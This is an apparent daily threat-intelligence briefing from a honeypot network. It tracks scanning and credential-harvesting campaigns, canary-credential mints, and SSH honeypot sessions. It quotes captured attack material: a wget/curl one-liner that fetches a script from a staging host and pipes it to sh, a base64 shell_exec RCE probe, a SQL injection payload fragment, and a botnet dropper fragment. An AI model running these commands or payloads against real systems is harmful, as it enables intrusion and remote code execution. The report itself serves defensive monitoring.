FLUX FLEET — INTEL BRIEFING №23
Period: 2026-09-16 07:34 – 2026-09-17 07:34 UTC (24h digest window, day 22 of operations)
Sources: 7 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East), ru-edge-1 (Russia), netcup-ts + sponge-01-ts + frantech-ts (deception-only, no canaries)
Confidence: High (direct observation, 22-day baseline, every result-tag spike attributed by spot query)
BLUF
Two new hostile operator sets carried the window. A 12-IP cluster on sponge-01-ts (23.94.155.0/24, ColocCrossing/Latitude.sh, all first-ever) ran a 7-minute config-and-login sweep at 07:24–07:31 UTC with the AKAMAI-CONFIG adminer shape (joomla_app + 22-char password) and drove sponge's +26% volume. INFOCREST-KIT returned under its first residential operator: 41.249.4.249 (Office National des Postes, MA) ran the full kit on ai-devbox-1 — adminer prod_rw POSTs, wp-batch SQLi byte-identical to the template, phpMyAdmin enum, config-bundle walk — and minted 3 canaries. CREDSWEEP returned named: 102.220.161.102 (VPS Dedicated LLC, SI, sibling of №13's .87) ran the identical 511-path .env census on farm+aidev, 2 rejected mints.
The frantech-ts fleet overview cell is a two-actor artifact, not a fleet shift: 23.234.119.20 (tzulo, US) and 138.199.6.195 (Datacamp, CH) each replayed the same 12,949-path IoT dropper-URL dictionary in 2–3 minute waves (+1401% to 27,839 events; 26k of it is these two). The Pfcloud MALWARE-DICT-2 loop stayed continuous on control+ru-edge (3,142 window events, wordlist grown 567→573 paths). Mint economics improved: 52 credentials to 29 collectors, 17 upstream rejections, failure ratio 0.33:1 — best measured window since tracking began. Zero AWS use for a fifth window.
Key Judgements
- The 23.94.155.x cluster is a config-harvest operator, not a scanner. 12 first-ever IPs from one /24 hit sponge within 7 minutes: 23.94.155.31 ran a 53-path
.envfanout plusAwsConfig.json/sendgrid.json/parameters.ymlcensus and webshell probes; .17 posted adminer credentials (joomla_app+ 22-char passwordblHaMJ2jmTV9e6SXlRTjyA— the AKAMAI-CONFIG shape from №12); .38 walked 10 phpMyAdmin variants; .32 ran the wp-batch SQLi body. (High confidence — shape match verified per IP; the 7-minute clustering and per-actor leg separation show orchestration, not coincidence.) - INFOCREST-KIT acquired its first residential operator and a WHM leg. 41.249.4.249 (ONP MA — NightAgent's home ISP, different AS) ran: fake-git walk → WHM/cPanel probes → form login → wp-batch SQLi → 3
/.envmints → config-bundle census →/..;/Tomcat bypasses → phpMyAdmin → adminerprod_rwPOSTs with 3 rotating passwords. (High confidence on template match — body bytes identical to the registered wp-batch SQLi; Moderate on campaign name — the WHM leg belongs to REGISTRY-HUNT's walk, so this operator blends two commodity kits.) - Attribution fix holds; one actor tried to defeat it. 0 empty-
clientIprows in 24,236 post-fix rows fleet-wide. The newxffPeerMismatchcounter caught a real forgery: 179.43.134.114 (Private Layer, CH) sent 2 requests to sponge withX-Forwarded-Fornaming Cloudflare addresses (172.65.98.125, 162.158.174.6) — attribution laundering, first hostile use of the counter. (High confidence — socket peer and XFF disagreement logged on both rows.) - The frantech volume spike is dictionary replay, twice. Two first-ever IPs each replayed one 12,949-path IoT dropper dictionary (23.234.119.20 in 52 s; 138.199.6.195 in 89 s), sharing all 12,949 paths and a 208-UA IoT rotation; 304 paths overlap MALWARE-DICT-2's list. (High confidence — path-set intersection = 12,949 of 12,949.)
Active Campaigns (day 22 status)
AKAMAI-CONFIG ⚠ NEW OPERATOR CLUSTER (23.94.155.0/24, sponge-01-ts)
- Actors: 12 first-ever IPs, ColocCrossing/Latitude.sh (US). Splits by leg: .31 (env fanout + config JSONs + webshell probes), .17 (adminer
joomla_app+blHaMJ2jmTV9e6SXlRTjyA), .38 (phpMyAdmin enum), .32 (wp-batch SQLi), .13/.18/.37/.20/.26/.27/.33/.24 (single-path python-requests tarpit probes). - TTPs: 53-path
.envdirectory fanout (first-seen paths/admin-app/.env,/private/.env,/apps/.env,/config/config.json,/AwsConfig.json,/sendgrid.json,/deployment-config.json,/credentials/config.json,/parameters.yml); adminer credential POST shape identical to №12's AKAMAI-CONFIG (joomla_appusername, 22-char password); phpMyAdmin 10-path login enum; one wp-batch SQLi POST; forged Chrome/105/106 + Firefox/105 UAs per leg. - Assessment: The №12 single-IP template now runs as a multi-actor cluster with per-leg IP separation. Same campaign, bigger footprint: what one Akamai IP did on both EU nodes in 20 min, this set did on one node in 7 min. Watch for the cluster on other nodes and for a mint attempt — 0 mints so far.
INFOCREST-KIT ⟳ FIFTH OPERATOR (41.249.4.249, ONP MA) — ai-devbox-1
- Actors: 41.249.4.249, AS36903 Office National des Postes (Maroc Telecom) — first INFOCREST operator on residential Moroccan infrastructure; prior operators were US hosting (Infocrest, HostRoyale) and EU VPS. Same ASN family as NIGHTAGENT's six IPs; no shared TTP with NightAgent.
- TTPs: 377 events in 6 min: fake-git walk →
/whm+/openid_connect/cpanelid(REGISTRY-HUNT leg) →user=root&pass=wrongform login → wp-batch SQLi (author_exclude=0) UNION SELECT...CONCAT(0x7c7c,HEX(CAST((SELECT 0x4b4b)AS CHAR))...) byte-identical to the standing template → 3/.envmints → 60 config-bundle JS paths →/..;/env*.jsTomcat bypasses → phpMyAdmin 10-path enum → 9 adminer POSTs,prod_rwwith rotating passwordsRRLY6MiJE3TOur-txM79Yw,6t9UK7jreHan3rAzXiVyDw,D9bYKfOlmWdaEjO6_gnaMQ. - Assessment: The kit's template survives operator rotation (5 IPs over 6 windows), now from residential space where blocklisting is hard. The mint haul (3) is the campaign's first since №13's 1-mint runs. The composite WHM leg suggests kit-sharing or a merged operator playbook.
CREDSWEEP ⟳ RETURN, NAMED (102.220.161.102, VPS Dedicated LLC SI) — farm + aidev
- Actors: 102.220.161.102 (511-path census on canary-farm-1 00:11–00:26 and ai-devbox-1 23:52–00:05, 514+514 events, identical path sets). Sibling .87 (№13 operator; 511/511 path overlap with .102's set) and .139 (№22, 2 mints) are standing in the same /24.
- TTPs: The full 511-path
.env-variant census (511/511 overlap with .87's list), Chrome/126.0.0.0 exact UA, pacing 15 min/node; webshell-sweep, yii2-debug, sftp-config families all present; 2 mint rejections (one per node). - Assessment: The №13 campaign's wordlist now runs under a second named block IP. The VPS Dedicated /24 holds 3 operators and 5 all-time mints with zero observed use.
LIBREDTAIL-KIT ⟳ NINTH WINDOW, WIDEST SPREAD (17 operators, all 7 nodes)
- Actors: 17 IPs, all fresh: 103.46.186.85, 106.63.14.150, 109.238.140.87 (netcup ×5), 129.121.128.70, 129.204.31.138 (Tencent CN — new), 144.172.105.41, 159.89.133.65, 2.29.38.95, 144.225.6.182, 212.227.98.3, 223.123.65.54, 37.221.113.13, 45.43.37.254, 60.12.44.234, 88.218.94.33, 165.99.207.153, 125.247.51.6.
- TTPs: Unchanged chain —
md5("Hello PHPUnit")probes across eval-stdin permutations, thenPOST /index.phpwithshell_exec(base64_decode(...))(ed25519 key echo), then the dropper. Every run captured:(wget --no-check-certificate -qO- https://217.60.103.56/sh || curl -sk https://217.60.103.56/sh) | sh -s apache. Staging host 217.60.103.56 unchanged for a third window. - Assessment: One run per IP, ~40 s each, honest
libredtail-httpUA, zero credential interest. The fleet's most consistent RCE-probing campaign; body capture (17/17) now stable after the №22 feed fix.
MALWARE-DICT / MALWARE-DICT-2 ⟳ (Pfcloud loop + synchronized IoT replay + frantech mega-dictionary)
- Actors: 204.76.203.18 (Pfcloud UG, NL) continuous on control+ru-edge: 3,142 events / 573 paths — the wordlist grew again (567→573). 23.234.119.20 (tzulo, US) and 138.199.6.195 (Datapacket/Datacamp, CH) each ran the 12,949-path dictionary on frantech (2,589 s of combined replay, 208 rotating IoT UAs, 27.3k
not-handled); 304-path overlap with MALWARE-DICT-2's list. - TTPs: Dropper-URL GET dictionaries at arch-suffix fanout (
/bins/*.{arm,mips,mpsl,ppc,sh4,x86…},/cloud/form_NNNNN.pdf.ps1,/atomic/,/nullnet_bin_dir/); 2 trap-family probes each (exchange-powershell-pre-auth,llm-endpoint-ollama-ps,gravitysmtp-miss,observability-profiler-index— 2 events each, 0 mints). - Assessment: The 12,949-path list is a new dictionary record for a single replay (previous record: OMEGA-SWEEP's 1,042). Two hosts, one list, 15 h apart — the same operator tooling running twice. The Pfcloud loop's wordlist growth continues.
REGISTRY-HUNT ⟳ (LeakIX) — farm + aidev, 22 IPs, 18 mints
- Actors: 22 l9scan IPs, all DigitalOcean; UA variants 2.0.234313… (farm) and 2.0.632323… (aidev) stable since №15.
- TTPs: Unchanged 12-step WebLogic→Confluence→WHM→Docker-registry walk; 18
/.envmints at 41 events per IP. - Assessment: Volume returned to №15-wave scale (566+527 events) after №22's 16-IP wave. 1 mint per IP continues; the service's mints-to-date now exceed 60 all-time with zero observed use.
Standing actors (persistence check)
- 80.94.95.211 (SS-Net RO) — aidev 42 ev + ru-edge 42 ev, 6 mints (3+3), 38 paths. Eleventh window in twelve; the №16 shared-wordlist link to Feo Prest .175 holds (identical 49-path core).
- 213.209.159.175 (Feo Prest DE) — farm 93 ev + control 86 ev across 6 passes (Safari 5.1.5, Firefox 3.5.4 SUSE, iPad 6.0, Chrome/51), 8 mints (4 farm + 4 control). Heaviest mint day for this operator; 19 all-time.
- 94.154.46.247/.250/.244 (Omegatech, OMEGA-SWEEP /46) — control 1,042 paths (1,050 ev, 6 mints) at 04:01; .250 ran the 743-path core on control (750 ev, 5 mints) at 12:34; .244 ran the 150-path pass on frantech (07:01). First named runs since №22's wave; hoard now 24+ window creds with zero use.
- 69.5.20.14 (Byteplus, ALIYUN-PROBE) — frantech 960 ev + control 915 + aidev 926, unchanged 9-UA rotation and
/.aliyun/*sweep, 4 mints (2 aidev, 2 control). - 176.65.148.71 — control
/.envmint (Chrome/124) 17:48; sibling .184 on ru-edge hit/xmlrpc/2/common(22:34). The 4-window single-purpose collector streak continues (4 all-time mints). - 195.178.110.159 (Techoff SRV NL) ⚠ NEW — 295 events/199 paths in 106 s on aidev: 242 fake-git + 43 fake-git-miss, honest
curl/7.81.0, 2 mint rejections, 1aws-credentials-file-error. Git-internals walker from the same org as the TECHOFF kit's standing .204. Same-org new IP 45.148.10.95 (148 events, Firefox/91 + empty UA, fake-git census ru-edge+farm) — the git-walk template now has two fresh Techoff IPs. - 209.159.155.142 (Interserver US) ⚠ NEW —
git/2.39.0UA, 16 paths:/.git/HEAD,/.git/config, and a full/.git/hooks/enumeration (16 hook names), 350 events across farm+aidev over 25 h, 63 fake-git/273 fake-git-miss. Hooks enumeration is a GIT-VAULT-family shape. - 45.156.128.x/129.x (WP-ENUM generation 2) — farm .37 (44 ev) + .129 (27 ev) and sponge .46 (42 ev) + .133 (29 ev) all ran the plugin
readme.txtcensus +wp-rest-indexprobes, 0 mints. Third consecutive window with this block active. - Absent: METADATA-HUNT (0
/@fs, 0__aws_leak_proberows — second consecutive idle window since the 8.234.173.27 run), ENV-CENSUS-3/4, NIGHTAGENT (sixth idle), XMLRPC-BRUTE (1 stray/xmlrpc/2/commonGET, no POSTs), CRUSADER-SWEEP (seventh idle), CURL-SWEEP (sixth miss).
Fleet Observations
Canary credentials
Summary
No canary credentials were used in AWS during the window. Fleet sensors minted 52 credentials to 29 collector IPs; none reached AWS.
Mint → use funnel
| Metric | Count |
|---|---|
| Credentials minted (fleet, window) | 52 |
| Distinct collector IPs | 29 |
| Credentials used in AWS (alerts) | 0 |
| Credentials stolen, no observed AWS use in window | 52 |
Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):
| Theft IP | Sensor | Mints (window) | Creds used in AWS | Use IPs | Operations | Mint history (6d) |
|---|---|---|---|---|---|---|
94.154.46.250 |
control-1 | 5 | 0 | 0 | — | 5 mints since 2026-09-16 12:34 |
213.209.159.175 |
canary-farm-1 | 4 | 0 | 0 | — | 11 mints since 2026-09-10 22:43 |
213.209.159.175 |
control-1 | 4 | 0 | 0 | — | 11 mints since 2026-09-10 22:43 |
41.249.4.249 |
ai-devbox-1 | 3 | 0 | 0 | — | 3 mints since 2026-09-17 03:54 |
80.94.95.211 |
ai-devbox-1 | 3 | 0 | 0 | — | 9 mints since 2026-09-10 11:06 |
80.94.95.211 |
ru-edge-1 | 3 | 0 | 0 | — | 9 mints since 2026-09-10 11:06 |
157.245.105.107 |
ai-devbox-1 | 2 | 0 | 0 | — | 2 mints since 2026-09-16 19:57 |
159.89.12.166 |
canary-farm-1 | 2 | 0 | 0 | — | 3 mints since 2026-09-11 20:20 |
69.5.20.14 |
ai-devbox-1 | 2 | 0 | 0 | — | 4 mints since 2026-09-16 09:23 |
69.5.20.14 |
control-1 | 2 | 0 | 0 | — | 4 mints since 2026-09-16 09:23 |
102.220.161.139 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-15 21:00 |
134.209.25.199 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-15 21:06 |
138.68.144.227 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-15 21:40 |
138.68.86.32 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-15 21:03 |
139.59.143.102 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-11 20:36 |
143.110.213.72 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-10 20:31 |
143.244.168.161 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-16 14:49 |
144.172.99.12 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-16 19:36 |
147.90.209.27 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-16 23:25 |
159.89.174.87 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-15 21:40 |
164.92.107.174 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-16 15:16 |
165.227.173.41 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-11 20:20 |
167.99.181.249 |
ai-devbox-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-15 18:13 |
176.65.148.71 |
control-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-11 11:39 |
206.81.24.227 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-16 19:29 |
209.38.248.17 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-15 20:29 |
34.18.54.217 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-16 16:11 |
34.77.235.103 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-16 17:43 |
45.148.10.5 |
ru-edge-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-16 17:10 |
57.154.242.54 |
ai-devbox-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-16 14:23 |
64.226.65.160 |
canary-farm-1 | 1 | 0 | 0 | — | 3 mints since 2026-09-15 20:17 |
64.23.218.208 |
canary-farm-1 | 1 | 0 | 0 | — | 2 mints since 2026-09-11 20:36 |
Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):
None: 46 mints, 2026-09-12 08:14 → 2026-09-15 10:51136.117.52.210: 26 mints, 2026-09-14 00:41 → 2026-09-14 00:4134.32.131.244: 25 mints, 2026-09-11 21:44 → 2026-09-11 21:4494.154.46.249: 12 mints, 2026-09-11 13:47 → 2026-09-11 13:48213.209.159.175: 11 mints, 2026-09-10 22:43 → 2026-09-17 06:2894.154.46.242: 10 mints, 2026-09-15 15:58 → 2026-09-15 15:5894.154.46.243: 10 mints, 2026-09-15 20:50 → 2026-09-15 20:5094.154.46.245: 10 mints, 2026-09-10 16:25 → 2026-09-10 16:2594.154.46.246: 10 mints, 2026-09-12 04:12 → 2026-09-12 04:1380.94.95.211: 9 mints, 2026-09-10 11:06 → 2026-09-17 01:09129.222.206.62: 8 mints, 2026-09-15 18:35 → 2026-09-15 21:408.234.173.27: 7 mints, 2026-09-16 00:03 → 2026-09-16 00:0394.154.46.247: 6 mints, 2026-09-16 04:01 → 2026-09-16 04:0294.154.46.250: 5 mints, 2026-09-16 12:34 → 2026-09-16 12:34136.70.175.146: 4 mints, 2026-09-12 06:33 → 2026-09-12 06:33160.177.217.115: 4 mints, 2026-09-11 21:02 → 2026-09-11 21:43167.99.79.44: 4 mints, 2026-09-11 18:18 → 2026-09-11 18:1969.5.20.14: 4 mints, 2026-09-16 09:23 → 2026-09-16 15:50159.89.12.166: 3 mints, 2026-09-11 20:20 → 2026-09-16 21:07176.65.148.71: 3 mints, 2026-09-11 11:39 → 2026-09-16 17:4841.249.4.249: 3 mints, 2026-09-17 03:54 → 2026-09-17 03:5564.226.65.160: 3 mints, 2026-09-15 20:17 → 2026-09-16 21:06
Mint economics and attribution
52 flux issued rows / 52 Tracebit credentials to 29 collectors; 17 upstream 400 rejections (aidev 9, farm 6, control 2); failure ratio 0.33:1 — the best measured window since tracking began (№21's record was 11.6:1). The rejections spread thin: 14 IP-sensor pairs at 1 rejection each, led by 195.178.110.159 (2). Zero AWS use for a fifth window; the standing named-collector hoard grew to roughly 290 credentials.
The socket-peer attribution build held for a full cycle: 0 empty-clientIp rows in 24,236 post-fix rows fleet-wide. The new xffPeerMismatch counter fired on 5 rows: the 2 known deploy-check probes (70.8.208.88, /verify-forged//verify-chain) and 3 real forgeries — 179.43.134.114 twice (XFF claims Cloudflare IPs 172.65.98.125/162.158.174.6, path /tr, 8 h apart on sponge) and one metabase-cve-2026-72898-detect/1.0 self-labeled probe from 31.56.58.59 (FR) whose XFF agrees with its peer (not a forgery — counter semantics note: it appears in the mismatch list because the header names the peer exactly once; treat as benign-labeled research, 8 all-time rows on 2 sensors).
Fleet-side changes
None this cycle. The attribution fix and XFF counter deployed 09-15 remain verified in production.
SSH/telnet honeypot (frantech-ts — single sensor, not fleet-wide)
Funnel: 518 sources → 381 shells (74%) → 155 command-runners (41% of shell-getters, 30% of sources). Event level: 26,709 credential attempts → 17,933 accepted logins → 8,951 commands. Per-login conversion: 50% of accepted logins ran something, down from 67% in №22 but inside the normal band.
New commands (my count against the full hp history, per the day-file offset quirk: 8 of 32 distinct):
- 132.243.164.33 (S.C. INFOTECH-GRUP, MD; root/123456, 1 login) — a botnet dropper script:
#!/bin/sh wdir="/tmp" for i in "/dev/shm" "/tmp" "/var/tmp" "/home" "/root"; do touch "$i/test_exec" … chmod +x …followed byls -la /var/run/gcc.pid— thegcc.pidcheck is the XOR.DdoS/Gagaviz lineage marker, first appearance in the hp corpus. - Password-reset loop continues, now the dominant first-command class — 4 first-time IPs, all
chpasswd/passwdwith fresh values: 172.172.180.124 (root:85pdj4ySlL3r), 114.80.39.74 (root:wGtHpucnHXD5,root:DNIhaL539cDo,server123/5WJqmVSGyFiE×passwd), 106.75.153.103 (root:XGKUFUofCrNZ,123456/GL3WBHlL6DD9×passwd). The №21-named persistence pattern is now the majority behavior for hands-on operators: recon, reset, plant key. - The 94.154.43.69 (Storm Industries)
handshakebins.shsession from №22 did not repeat in-window (its 05:00 session sits in the №22 overlap; one telnet auth at hour 23).
Credentials: 11,734 distinct pairs offered, 0 new. Concentration unchanged — 345gs5662d34/3245gs5662d34 commodity family owns the top rows (1,187 + 853 + 58 + 51 attempts across usernames).
Gaps / Next Collection
- 23.94.155.x cluster follow-up: the /24 ran once on sponge with zero mints. If it returns on the canary nodes, its
.envfanout will mint — watch for a mint wave under ColocCrossing/Latitude.sh and correlate with the AKAMAI-CONFIG adminer leg. - 179.43.134.114 XFF laundering: 2 events on a single path is thin. If the socket-peer/XFF mismatch counter fires again for this peer or any new peer, pivot on
socketPeerand treat the XFF chain as false attribution — collect the full journey before judging. - AWS-use watch: 52 credentials to 29 collectors, hoard ≈290, five idle windows. The next Credential-Drain event is overdue by the №20 precedent (mint-to-use within 6 min). Check Tracebit alerts against the full credential TTL, not the flux window alone.
- Techoff git-walker growth: two fresh same-org IPs (195.178.110.159, 45.148.10.95) within one day of each other suggests a rotating pool behind the git-walk template. Track path-set overlap against GIT-VAULT's 128.24.167.75 corpus.
- frantech mega-dictionary: capture the full 12,949-path list offline (it replayed twice; both hosts may recur). A third replay would warrant promoting it to a campaign alongside MALWARE-DICT-2.